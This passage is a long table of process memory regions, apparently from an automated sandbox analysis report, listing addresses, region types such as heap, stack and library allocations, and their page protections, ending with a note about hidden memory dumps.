|
page read and write
|
||
|
28138280000
|
heap
|
page read and write
|
||
|
2A85A4C0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BC70000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BCFC000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BC80000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BD30000
|
trusted library allocation
|
page read and write
|
||
|
201CBFB0000
|
trusted library allocation
|
page read and write
|
||
|
17EE5A95000
|
heap
|
page read and write
|
||
|
201CA783000
|
heap
|
page read and write
|
||
|
1EC44F89000
|
heap
|
page read and write
|
||
|
2813BD60000
|
direct allocation
|
page read and write
|
||
|
1EC48293000
|
trusted library allocation
|
page read and write
|
||
|
7DF499370000
|
trusted library allocation
|
page execute and read and write
|
||
|
1EC482AE000
|
trusted library allocation
|
page read and write
|
||
|
17EE5AD6000
|
heap
|
page read and write
|
||
|
C0002C4000
|
direct allocation
|
page read and write
|
||
|
FAB5EFE000
|
stack
|
page read and write
|
||
|
17E802E6000
|
heap
|
page read and write
|
||
|
7FFD9BCE0000
|
trusted library allocation
|
page read and write
|
||
|
C0000C6000
|
direct allocation
|
page read and write
|
||
|
C000022000
|
direct allocation
|
page read and write
|
||
|
C00036C000
|
direct allocation
|
page read and write
|
||
|
1EC488D7000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BB80000
|
trusted library allocation
|
page execute and read and write
|
||
|
2813BB00000
|
direct allocation
|
page read and write
|
||
|
2A85A9A6000
|
trusted library allocation
|
page read and write
|
||
|
2066B2B0000
|
heap
|
page read and write
|
||
|
29E3A242000
|
trusted library allocation
|
page read and write
|
||
|
2813830A000
|
heap
|
page read and write
|
||
|
17EEA4A1000
|
trusted library allocation
|
page read and write
|
||
|
2813835E000
|
heap
|
page read and write
|
||
|
7DA5DFE000
|
stack
|
page read and write
|
||
|
2A8743AB000
|
unclassified section
|
page read and write
|
||
|
28138311000
|
heap
|
page read and write
|
||
|
7FFD9BC90000
|
trusted library allocation
|
page read and write
|
||
|
29E387F6000
|
heap
|
page read and write
|
||
|
C000438000
|
direct allocation
|
page read and write
|
||
|
1EC44E70000
|
heap
|
page read and write
|
||
|
1AE02AB6000
|
trusted library allocation
|
page read and write
|
||
|
39381CC000
|
stack
|
page read and write
|
||
|
2A858A6D000
|
heap
|
page read and write
|
||
|
28138337000
|
heap
|
page read and write
|
||
|
7FFD9BDC0000
|
trusted library allocation
|
page read and write
|
||
|
1EC44FCB000
|
heap
|
page read and write
|
||
|
2A8743E0000
|
unclassified section
|
page write copy
|
||
|
7FFD9BCC0000
|
trusted library allocation
|
page read and write
|
||
|
C0002FE000
|
direct allocation
|
page read and write
|
||
|
7DA5EFF000
|
stack
|
page read and write
|
||
|
207C4310000
|
heap
|
page read and write
|
||
|
17EEA489000
|
trusted library allocation
|
page read and write
|
||
|
24150D64000
|
heap
|
page read and write
|
||
|
1EC47B46000
|
trusted library allocation
|
page read and write
|
||
|
201C8F40000
|
trusted library allocation
|
page read and write
|
||
|
29E3A3F8000
|
trusted library allocation
|
page read and write
|
||
|
C000082000
|
direct allocation
|
page read and write
|
||
|
E1EF4F8000
|
stack
|
page read and write
|
||
|
17EE7340000
|
heap
|
page readonly
|
||
|
2A8799C0000
|
direct allocation
|
page read and write
|
||
|
29E38A24000
|
heap
|
page read and write
|
||
|
1EC5EE88000
|
heap
|
page read and write
|
||
|
C00002F000
|
direct allocation
|
page read and write
|
||
|
1AE0273D000
|
trusted library allocation
|
page read and write
|
||
|
C000247000
|
direct allocation
|
page read and write
|
||
|
7FFD9BC70000
|
trusted library allocation
|
page read and write
|
||
|
39374F8000
|
stack
|
page read and write
|
||
|
29E52AE0000
|
heap
|
page read and write
|
||
|
2A873850000
|
direct allocation
|
page read and write
|
||
|
C00047E000
|
direct allocation
|
page read and write
|
||
|
28138381000
|
heap
|
page read and write
|
||
|
FF0714D000
|
stack
|
page read and write
|
||
|
201CC1ED000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA66000
|
trusted library allocation
|
page execute and read and write
|
||
|
201CA7EF000
|
heap
|
page read and write
|
||
|
1EC5EDC0000
|
heap
|
page read and write
|
||
|
17E171C0000
|
heap
|
page read and write
|
||
|
2813BD6E000
|
direct allocation
|
page read and write
|
||
|
1EC44F65000
|
heap
|
page read and write
|
||
|
2813BD40000
|
direct allocation
|
page read and write
|
||
|
201E2FB0000
|
heap
|
page read and write
|
||
|
29E3A9D3000
|
trusted library allocation
|
page read and write
|
||
|
A7567F6000
|
stack
|
page read and write
|
||
|
C0000D2000
|
direct allocation
|
page read and write
|
||
|
1EC5F100000
|
heap
|
page read and write
|
||
|
7FFD9BBD0000
|
trusted library allocation
|
page read and write
|
||
|
179D1E90000
|
heap
|
page read and write
|
||
|
311003E000
|
stack
|
page read and write
|
||
|
17EEA475000
|
trusted library allocation
|
page read and write
|
||
|
C000434000
|
direct allocation
|
page read and write
|
||
|
2813832A000
|
heap
|
page read and write
|
||
|
17EEA49F000
|
trusted library allocation
|
page read and write
|
||
|
C000470000
|
direct allocation
|
page read and write
|
||
|
1EC482E6000
|
trusted library allocation
|
page read and write
|
||
|
201C8B30000
|
heap
|
page read and write
|
||
|
1AE1A7A3000
|
heap
|
page read and write
|
||
|
E1F078E000
|
stack
|
page read and write
|
||
|
201CBF98000
|
trusted library allocation
|
page read and write
|
||
|
C0003DF000
|
direct allocation
|
page read and write
|
||
|
201C8F60000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BBB0000
|
trusted library allocation
|
page read and write
|
||
|
201C8CEB000
|
heap
|
page read and write
|
||
|
28138312000
|
heap
|
page read and write
|
||
|
7FFD9B990000
|
trusted library allocation
|
page read and write
|
||
|
29E52BC4000
|
heap
|
page read and write
|
||
|
17E80442000
|
heap
|
page read and write
|
||
|
1AE027DE000
|
trusted library allocation
|
page read and write
|
||
|
1F984420000
|
heap
|
page read and write
|
||
|
16107F20000
|
heap
|
page read and write
|
||
|
7FFD9BB87000
|
trusted library allocation
|
page read and write
|
||
|
17E171CE000
|
heap
|
page read and write
|
||
|
E1EF27F000
|
stack
|
page read and write
|
||
|
2813833F000
|
heap
|
page read and write
|
||
|
17EE7393000
|
trusted library allocation
|
page read and write
|
||
|
C00037C000
|
direct allocation
|
page read and write
|
||
|
201CC220000
|
trusted library allocation
|
page read and write
|
||
|
2A86BBA7000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BB70000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9BB70000
|
trusted library allocation
|
page execute and read and write
|
||
|
C0003C2000
|
direct allocation
|
page read and write
|
||
|
24150B3C000
|
heap
|
page read and write
|
||
|
C000468000
|
direct allocation
|
page read and write
|
||
|
17EE74D0000
|
heap
|
page read and write
|
||
|
7FFD9BC80000
|
trusted library allocation
|
page read and write
|
||
|
1EC5F080000
|
heap
|
page read and write
|
||
|
21EF0BD0000
|
heap
|
page read and write
|
||
|
28139DA0000
|
heap
|
page read and write
|
||
|
2A86A781000
|
trusted library allocation
|
page read and write
|
||
|
2A85AAFB000
|
trusted library allocation
|
page read and write
|
||
|
1EC44E74000
|
heap
|
page read and write
|
||
|
C000058000
|
direct allocation
|
page read and write
|
||
|
1EC44F5E000
|
heap
|
page read and write
|
||
|
352BFF000
|
stack
|
page read and write
|
||
|
B842CFF000
|
stack
|
page read and write
|
||
|
2A85AB25000
|
trusted library allocation
|
page read and write
|
||
|
FAB5B63000
|
stack
|
page read and write
|
||
|
17E802DC000
|
heap
|
page read and write
|
||
|
17E8048F000
|
heap
|
page read and write
|
||
|
1EC47062000
|
trusted library allocation
|
page read and write
|
||
|
2A872D84000
|
heap
|
page read and write
|
||
|
7FFD9BB5A000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B9A4000
|
trusted library allocation
|
page read and write
|
||
|
C000482000
|
direct allocation
|
page read and write
|
||
|
C00045E000
|
direct allocation
|
page read and write
|
||
|
17EE84D0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA56000
|
trusted library allocation
|
page read and write
|
||
|
2A872AE8000
|
heap
|
page read and write
|
||
|
17EEA519000
|
trusted library allocation
|
page read and write
|
||
|
2A858DB4000
|
heap
|
page read and write
|
||
|
E1EF17F000
|
stack
|
page read and write
|
||
|
1AE0079D000
|
heap
|
page read and write
|
||
|
1F7E9230000
|
heap
|
page read and write
|
||
|
C0000CE000
|
direct allocation
|
page read and write
|
||
|
1EC44F26000
|
heap
|
page read and write
|
||
|
201CAA56000
|
trusted library allocation
|
page read and write
|
||
|
201C8CC3000
|
heap
|
page read and write
|
||
|
201C8CF7000
|
heap
|
page read and write
|
||
|
7FFD9BBA0000
|
trusted library allocation
|
page read and write
|
||
|
28138337000
|
heap
|
page read and write
|
||
|
1EA08F38000
|
heap
|
page read and write
|
||
|
7FFD9BD00000
|
trusted library allocation
|
page read and write
|
||
|
393834E000
|
stack
|
page read and write
|
||
|
7FFD9BBF0000
|
trusted library allocation
|
page read and write
|
There are 1350 hidden memdumps, click here to show them.